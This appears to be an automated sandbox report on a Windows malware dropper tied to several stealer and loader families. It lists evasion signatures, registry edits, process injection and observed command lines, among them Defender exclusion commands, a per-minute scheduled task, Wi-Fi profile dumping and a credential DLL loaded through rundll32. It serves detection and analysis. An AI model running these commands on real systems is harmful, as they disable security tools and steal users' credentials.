Malware Analysis Report

2025-06-15 19:54

Sample ID 240425-vzb6dsda98
Target 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
SHA256 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
Tags
amadey glupteba lumma redline stealc zgrat @cloudytteam test1234 dropper evasion infostealer loader rat stealer themida trojan spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854

Threat Level: Known bad

The file 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854 was found to be: Known bad.

Malicious Activity Summary

Windows security bypass

ZGRat

Stealc

RedLine payload

Glupteba

Detect ZGRat V1

Lumma Stealer

RedLine

Glupteba payload

Amadey

UAC bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Identifies Wine through registry keys

Checks BIOS information in registry

Reads user/profile data of web browsers

Windows security modification

Reads local data of messenger clients

Themida packer

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads WinSCP keys stored on the system

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-25 17:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 17:25

Reported

2024-04-25 17:27

Platform

win10v2004-20240412-en

Max time kernel

56s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 4640 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2940 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 2940 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2940 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe
PID 2940 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4660 -ip 4660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 868

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2212 -ip 2212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 332

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4244 -ip 4244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 356

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

"C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe"

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe

"C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb20f0ab58,0x7ffb20f0ab68,0x7ffb20f0ab78

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1ebc46f8,0x7ffb1ebc4708,0x7ffb1ebc4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe

"C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

